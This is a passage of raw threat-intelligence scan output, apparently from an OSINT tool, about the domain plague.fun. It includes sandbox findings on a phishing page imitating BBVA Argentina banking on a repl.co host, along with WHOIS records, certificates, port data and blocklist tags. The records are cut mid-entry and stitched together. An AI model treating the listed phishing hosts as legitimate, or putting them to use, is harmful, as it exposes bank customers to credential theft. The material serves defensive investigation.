00000000-00003028]\n Dropped file: "T4BI7YRG.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\T4BI7YRG.txt]- [targetUID: 00000000-00003028]\n Dropped file: "6Q25NQIL.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6Q25NQIL.txt]- [targetUID: 00000000-00003028]\n Dropped file: "L2LWFGYF.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\L2LWFGYF.txt]- [targetUID: 00000000-00003028]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "CabC0B9.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"cash_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "logo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "profile_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "poper.min_1_.js" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00004024]\n "large.lc-20220223-181547-lc.min.ACSHASH8f81358eebb18a1778ddd3319a401956_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003028]\n "icons_1_.css" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "~DFBAA192D55BF21B63.TMP" has type "data"- Location: [%TEMP%\\~DFBAA192D55BF21B63.TMP]- [targetUID: 00000000-00004024]\n "W05YX9G3.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\W05YX9G3.txt]- [targetUID: 00000000-00003028]\n "_54E98CF3-48C6-11ED-9793-080027B7866D_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "H4T1U159.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\H4T1U159.txt]- [targetUID: 00000000-00003028]\n "TarC0BA.tmp" has type "data"- Location: [%TEMP%\\TarC0BA.tmp]- [targetUID: 00000000-00003028]\n "B398B80134F72209547439DB21AB308D_9487BC0D4381A7CDEB9A8CC43F66D27C" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\B398B80134F72209547439DB21AB308D_9487BC0D4381A7CDEB9A8CC43F66D27C]- [targetUID: 00000000-00003028]\n "fix_1_.css" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "bbvaweb-book-woff_1_.woff" has type "Web Open Font Format TrueType length 68827 version 1.0"- [targetUID: N/A]\n "F4RUS99S.htm" has type "HTML document UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\F4RUS99S.htm]- [targetUID: 00000000-00003028]\n "NA01GQNY.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NA01GQNY.txt]- [targetUID: 00000000-00004024]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://frances.hombanking.repl.co/"\n Pattern match: "https://frances.hombanking.repl.co"\n Heuristic match: "bbva.com.ar"\n Heuristic match: "frances.hombanking.repl.co"\n Pattern match: "https://bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.alert/small.lc-20220223-181547-lc.min.ACSHASH188b9a681452e17cd885be8f4ee86173.css"\n Pattern match: "https://schema.org/SiteNavigationElement"\n Pattern match: "https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"\n Pattern match: "m.ar/apps/bbva/pwebs/components/clientlibs/bbva.access/small.lc-20220223-181547-lc.min.css"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "https://www.bbva.com.ar/fnetcore/assets/img/public/bg-blueCore.svg"\n Pattern match: "https://www.bbva.com.ar/fnetcore/assets/img/left-arrow.png"\n Pattern match: "https://www.bbva.com.ar/fnetcore/assets/img/arrow_right.png"\n Pattern match: "https://www.bbva.com.ar/fnetcore/assets/fonts/bbva-book/bbvaweb-book-eot.eot"\n Pattern match: "https://www.bbva.com.ar/fnetcore/assets/fonts/coronita/BentonSansBBVA-Bold.svg"\n Pattern match: "https://www.bbva.com.ar/fnetcore/assets/fonts/bbva-icons-login/fonts/bbva-icons-login.svg#bbva-icons-login"\n Pattern match: "https://www.bbva.com.ar/fnetcore/assets/fonts/bbva-bsas/fonts/bbva-icons.ttf"\n Pattern match: "https://popper.js.org/"\n Pattern match: "http://dev.jquery.com/ticket/2752"\n Pattern match: "https://github.com/malsup/form/commit/588306aedba1de01388032d5f42a60159eea9228#commitcomment-2180219"\n Pattern match: "http://groups.google.com/group/jquery-dev/browse_thread/thread/36395b7ab510dd5d"\n Pattern match: "http://en.wikipedia.org/wiki/Same_origin_policy"\n Pattern match: "http://docs.jquery.com/Tutorials:Introducing_$(document). 34.149.204.188 2022-12-18 00:04:00 Physical Location No ipstack 0 0 1 0 None Netherlands 40.113.112.131 2022-12-18 00:10:20 Vulnerability - CVE Medium Yes Tool - testssl.sh 0 1 2 0 None CVE-2016-6329 https://nvd.nist.gov/vuln/detail/CVE-2016-6329 Score: 4.3 Description: OpenVPN, when using a 64-bit block cipher, makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTP-over-OpenVPN session using Blowfish in CBC mode, aka a "Sweet32" attack. 188.114.97.0 2022-12-18 00:07:18 Web Content Type No Web Spider 0 0 3 0 None text/html; charset=utf-8 http://misogyny.wtf/parser 2022-12-18 00:13:26 Affiliate - Email Address No E-Mail Address Extractor 0 0 2 0 None abuse@enom.com Domain Name: PLAGUE.FUN Registry Domain ID: D268611982-CNIC Registrar WHOIS Server: whois.enom.com Registrar URL: https://www.enom.com/ Updated Date: 2022-12-05T18:48:20.0Z Creation Date: 2022-01-08T12:59:17.0Z Registry Expiry Date: 2023-01-08T23:59:59.0Z Registrar: eNom, Inc. Registrar IANA ID: 48 Domain Status: serverHold https://icann.org/epp#serverHold Registrant Organization: Data Protected Registrant State/Province: WA Registrant Country: US Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: GARRETT.NS.CLOUDFLARE.COM Name Server: JOURNEY.NS.CLOUDFLARE.COM DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registrar Abuse Contact Email: domainabuse@tucows.com Registrar Abuse Contact Phone: +49.2283296859 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:49.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. Domain Name: plague.fun Registry Domain ID: D268611982-CNIC Registrar WHOIS Server: WHOIS.ENOM.COM Registrar URL: WWW.ENOM.COM Updated Date: 2022-12-05T18:48:20.00Z Creation Date: 2022-01-08T12:59:00.00Z Registrar Registration Expiration Date: 2023-01-08T23:59:59.00Z Registrar: ENOM, INC. Registrar IANA ID: 48 Domain Status: serverHold https://www.icann.org/epp#serverHold Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Alpes-Maritimes Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: FR Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: REDACTED FOR PRIVACY Registrant Email: https://tieredaccess.com/contact/177ad87c-41f0-4b87-926f-459f450a86e9 Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: REDACTED FOR PRIVACY Admin Email: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: REDACTED FOR PRIVACY Tech Email: REDACTED FOR PRIVACY Name Server: GARRETT.NS.CLOUDFLARE.COM Name Server: JOURNEY.NS.CLOUDFLARE.COM DNSSEC: unsigned Registrar Abuse Contact Email: ABUSE@ENOM.COM Registrar Abuse Contact Phone: +1.4259744689 URL of the ICANN WHOIS Data Problem Reporting System: HTTPS://ICANN.ORG/WICF >>> Last update of WHOIS database: 2022-12-18T00:02:49.00Z <<< For more information on Whois status codes, please visit https://icann.org/epp The data in this whois database is provided to you for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. We make this information available "as is," and do not guarantee its accuracy. By submitting a whois query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (1) enable high volume, automated, electronic processes that stress or load this whois database system providing you this information; or (2) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone. The compilation, repackaging, dissemination or other use of this data is expressly prohibited without prior written consent from us. We reserve the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. Version 6.3 4/3/2002 2022-12-18 00:24:06 Affiliate - Email Address No E-Mail Address Extractor 0 0 5 0 None private@register.it Domain Name: SETUPDNS.NET Registry Domain ID: 1581585796_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://www.register.it Updated Date: 2022-01-13T08:14:30Z Creation Date: 2010-01-12T13:36:45Z Registry Expiry Date: 2023-01-12T13:36:45Z Registrar: Register SPA Registrar IANA ID: 168 Registrar Abuse Contact Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:22:01Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: SETUPDNS.NET Registry Domain ID: 1581585796_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://we.register.it Updated Date: 2022-02-14T00:00:00Z Creation Date: 2010-01-12T00:00:00Z Registrar Registration Expiration Date: 2023-01-12T00:00:00Z Registrar: REGISTER S.P.A. Registrar IANA ID: 168 Registrar Abuse Contact Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Reseller: Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Registry Registrant ID: Registrant Name: Global Domain Privacy Registrant Organization: GLOBAL DOMAIN PRIVACY Registrant Street: Via Zanchi 22 Registrant City: Bergamo Registrant State/Province: BG Registrant Postal Code: 24126 Registrant Country: IT Registrant Phone: +39.353230400 Registrant Phone Ext: Registrant Fax: +39.353230312 Registrant Fax Ext: Registrant Email: z22lglbqy5igu1vav@registerprivateregistration.com Registry Admin ID: Admin Name: Global Domain Privacy Admin Organization: GLOBAL DOMAIN PRIVACY Admin Street: Via Zanchi 22 Admin City: Bergamo Admin State/Province: BG Admin Postal Code: 24126 Admin Country: IT Admin Phone: +39.353230400 Admin Phone Ext: Admin Fax: +39.353230312 Admin Fax Ext: Admin Email: z22lglbqy5igu1vav@registerprivateregistration.com Registry Tech ID: Tech Name: Global Domain Privacy Tech Organization: GLOBAL DOMAIN PRIVACY Tech Street: Via Zanchi 22 Tech City: Bergamo Tech State/Province: BG Tech Postal Code: 24126 Tech Country: IT Tech Phone: +39.353230400 Tech Phone Ext: Tech Fax: +39.353230312 Tech Fax Ext: Tech Email: private@register.it Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of whois database: 2022-12-18T00:22:21Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:04:35 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None {u'count': 2, u'search_terms': [{u'id': u'host', u'value': u'172.67.147.230'}], u'result': [{u'environment_id': 160, u'job_id': u'638b79ab6f23a45cc67a044e', u'analysis_start_time': u'2022-12-03 16:30:36', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 52, u'verdict': u'no verdict', u'submit_name': u'Pivigames.blog - Descarga JUEGOS GRATIS.url', u'sha256': u'd51ff0bf54967d6a468d148b1c29154b6e1971c6afb0d634b1cf4c9ea12fcbc8', u'type': None, u'type_short': u'file link', u'size': 211}, {u'environment_id': 120, u'job_id': u'617ee60fb53c2c10d819a570', u'analysis_start_time': u'2021-10-31 18:53:09', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': 64, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'a5b741295cd0f45f98a8381a32ff29f7dcf0cda8642b8fd26763a2e54ce299d6', u'type': None, u'type_short': u'url', u'size': 61}]} 172.67.147.230 2022-12-18 00:16:27 SSL Certificate - Issued to No SSL Certificate Analyzer 1 0 2 0 None C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com 188.114.97.3 2022-12-18 00:18:03 Web Technology No Tool - WhatWeb 0 0 2 0 None HTML5 webmail.zerotwo-best-waifu.online 2022-12-18 00:19:03 Raw Data from RIRs No ipapi.co 0 0 3 0 None {u'region_code': u'52', u'country_tld': u'.it', u'ip': u'195.110.124.246', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 60431283, u'country_code': u'IT', u'timezone': u'Europe/Rome', u'city': u'Florence', u'network': u'195.110.124.0/24', u'languages': u'it-IT,de-IT,fr-IT,sc,ca,co,sl', u'version': u'IPv4', u'latitude': 43.7891, u'in_eu': True, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'Italy', u'country_capital': u'Rome', u'org': u'Register S.p.A.', u'postal': u'50135', u'asn': u'AS39729', u'country': u'IT', u'region': u'Tuscany', u'longitude': 11.2356, u'country_calling_code': u'+39', u'country_area': 301230.0, u'country_code_iso3': u'ITA'} 195.110.124.246 2022-12-18 00:06:35 Open TCP Port No Pulsedive 0 0 2 0 None 188.114.97.0:80 188.114.97.0 2022-12-18 00:12:58 Malicious IP on Same Subnet Yes blocklist.de 0 0 2 0 None blocklist.de List [40.112.0.0/13] http://lists.blocklist.de/lists/all.txt 40.112.0.0/13 2022-12-18 00:28:20 Web Framework No Web Framework Identifier 0 0 5 0 None jQuery /*! * Bootstrap v3.4.1 (https://getbootstrap.com/) * Copyright 2011-2019 Twitter, Inc. * Licensed under the MIT license */ if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");!function(t){"use strict";var e=jQuery.fn.jquery.split(" ")[0].split(".");if(e[0]<2&&e[1]<9||1==e[0]&&9==e[1]&&e[2]<1||3this.$items.length-1||t<0))return this.sliding?this.$element.one("slid.bs.carousel",function(){e.to(t)}):i==t?this.pause().cycle():this.slide(i>> Last update of whois database: 2022-12-18T00:37:12Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: prgmr.com Registry Domain ID: 70002607_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.joker.com Registrar URL: https://joker.com Updated Date: 2022-05-22T20:37:35Z Creation Date: 2001-04-27T00:09:53Z Registrar Registration Expiration Date: 2023-04-26T22:09:32Z Registrar: CSL Computer Service Langenbach GmbH d/b/a joker.com Registrar IANA ID: 113 Registrar Abuse Contact Email: abuse@joker.com Registrar Abuse Contact Phone: +49.21186767447 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registrant Organization: Prgmr.com, Inc Registrant State/Province: ca Registrant Country: US Registrant Email: https://csl-registrar.com/contact/prgmr.com/owner Admin Email: https://csl-registrar.com/contact/prgmr.com/admin Tech Email: https://csl-registrar.com/contact/prgmr.com/tech Name Server: ns.prgmr.com Name Server: ns2.prgmr.com Name Server: ns3.prgmr.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:37:18Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTE: By submitting a WHOIS query, you agree to abide by the following NOTE: terms of use: You agree that you may use this data only for lawful NOTE: purposes and that under no circumstances will you use this data to: NOTE: (1) allow, enable, or otherwise support the transmission of mass NOTE: unsolicited, commercial advertising or solicitations via direct mail, NOTE: e-mail, telephone, or facsimile; or (2) enable high volume, automated, NOTE: electronic processes that apply to Joker.com (or its computer systems). NOTE: The compilation, repackaging, dissemination or other use of this data NOTE: is expressly prohibited without the prior written consent of Joker.com. 2022-12-18 00:20:56 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": [""]} 2606:4700:3031::ac43:93e6 2022-12-18 00:03:11 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 03:08:aa:47:53:40:59:b8:a3:96:dc:96:87:a9:7a:35:d6:08 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Sep 1 17:51:42 2022 GMT Not After : Nov 30 17:51:41 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:6b:d4:77:ba:7c:58:74:d4:f7:62:3e:a5:9e:fa: e4:b2:ad:38:11:67:f4:2c:6b:e2:4b:cf:d7:47:ec: bc:44:40:93:e0:b5:59:3b:36:a9:57:77:9f:e2:6e: a1:bf:09:57:5c:e1:38:9b:5d:d2:fd:8a:b1:b3:72: 69:72:d1:bd:91 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: EF:B8:30:CC:B8:73:D9:84:B0:36:57:51:D0:94:4A:9E:35:F7:78:1B X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 29:79:BE:F0:9E:39:39:21:F0:56:73:9F:63:A5:77:E5: BE:57:7D:9C:60:0A:F8:F9:4D:5D:26:5C:25:5D:C7:84 Timestamp : Sep 1 18:51:42.328 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:EC:B7:61:12:A5:3D:86:54:42:E0:1C: 85:40:38:6B:1D:DC:BA:74:3E:FB:D2:C9:05:2E:1B:34: 1F:4B:CF:C0:3C:02:21:00:CA:A5:73:8D:BE:D8:2E:ED: AF:66:9E:0E:49:DB:37:FC:64:F6:67:8F:A2:C7:49:F5: B3:0D:EF:74:4C:89:26:D0 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 41:C8:CA:B1:DF:22:46:4A:10:C6:A1:3A:09:42:87:5E: 4E:31:8B:1B:03:EB:EB:4B:C7:68:F0:90:62:96:06:F6 Timestamp : Sep 1 18:51:42.843 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:21:00:B2:88:F4:C8:20:58:BA:18:DF:D3:24: F9:B6:9D:A2:FC:37:E2:5E:FD:D6:C2:35:F0:CE:C0:20: 13:B5:BD:2D:71:02:20:5D:64:D2:39:18:69:DF:99:0F: 11:AA:B9:01:8A:83:D0:64:CE:C2:AC:37:88:44:B3:97: 19:6D:A7:47:66:1A:55 Signature Algorithm: ecdsa-with-SHA384 30:66:02:31:00:b4:96:26:f4:03:24:e4:bb:b5:82:aa:d3:c2: ec:b4:60:96:ff:57:69:98:07:04:6d:8a:c5:17:3b:fb:49:b6: ef:73:02:c4:ca:5c:ac:15:b2:01:f6:63:b3:d0:77:d1:f3:02: 31:00:99:35:fb:af:8e:bc:d9:93:22:b7:fb:68:cb:e4:95:19: 7b:22:15:d1:9b:48:d1:5a:7b:af:4c:0f:47:89:c3:60:70:13: 01:a0:8a:48:d6:54:db:a7:23:4a:87:4d:d3:db plague.fun 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None logitec-a53131 (Net ID: 00:01:8E:A5:31:30) 37.780462,-122.390564 2022-12-18 00:04:38 Raw Data from RIRs No Maltiverse 0 0 2 0 None {u'asn_registry': u'ripencc', u'country_code': u'US', u'classification': u'whitelist', u'asn_country_code': u'US', u'address': u'Viktualienmarkt Rosental 7 80331 Munchen, DE', u'creation_time': u'2022-01-24 08:21:16', u'asn_date': u'2012-09-07 00:00:00', u'tag': [u'phishing'], u'is_mining_pool': False, u'ip_addr': u'188.114.97.0', u'registrant_name': u'CloudFlare, Inc. 101 Townsend Street, San Francisco, CA 94107, US +1 (650) 319-8930 https://cloudflare.com/', u'last_updated': u'2015-10-16 16:26:10', u'number_of_whitelisted_domains_resolving': 1, u'is_known_scanner': False, u'location': {u'lat': 37.751, u'lon': -97.822}, u'type': u'ip', u'is_cnc': False, u'is_iot_threat': False, u'is_known_attacker': False, u'blacklist': [{u'count': 1, u'description': u'Phishing', u'labels': [u'compromised'], u'source': u'Maltiverse', u'first_seen': u'2022-04-07 12:41:52', u'last_seen': u'2022-04-07 12:41:52'}, {u'count': 1, u'source': u'Maltiverse', u'first_seen': u'2022-01-20 17:14:00', u'description': u'Malware', u'last_seen': u'2022-01-20 17:14:00'}], u'modification_time': u'2022-04-07 12:41:52', u'asn_cidr': u'188.114.97.0/24', u'number_of_domains_resolving': 1, u'is_tor_node': False, u'is_open_proxy': False, u'cidr': [u'188.114.96.0/22'], u'number_of_blacklisted_domains_resolving': 0, u'is_distributing_malware': False, u'is_sinkhole': False, u'is_hosting': False, u'is_cdn': False, u'as_name': u'AS13335 CloudFlare', u'is_vpn_node': False} 188.114.97.0 2022-12-18 00:02:43 SSL Certificate - Issued by No CertSpotter 0 0 1 0 None C=US,O=Google Trust Services LLC,CN=GTS CA 1P5 plague.fun 2022-12-18 00:18:23 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.9:80 188.114.97.0/24 2022-12-18 00:21:51 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77ac9cee6f082931-ORD Content-Encoding: gzip 172.67.137.37 2022-12-18 00:09:46 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.17:443 188.114.96.0/24 2022-12-18 00:02:50 Domain Whois No Whois 8 0 1 0 None Domain Name: PLAGUE.FUN Registry Domain ID: D268611982-CNIC Registrar WHOIS Server: whois.enom.com Registrar URL: https://www.enom.com/ Updated Date: 2022-12-05T18:48:20.0Z Creation Date: 2022-01-08T12:59:17.0Z Registry Expiry Date: 2023-01-08T23:59:59.0Z Registrar: eNom, Inc. Registrar IANA ID: 48 Domain Status: serverHold https://icann.org/epp#serverHold Registrant Organization: Data Protected Registrant State/Province: WA Registrant Country: US Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: GARRETT.NS.CLOUDFLARE.COM Name Server: 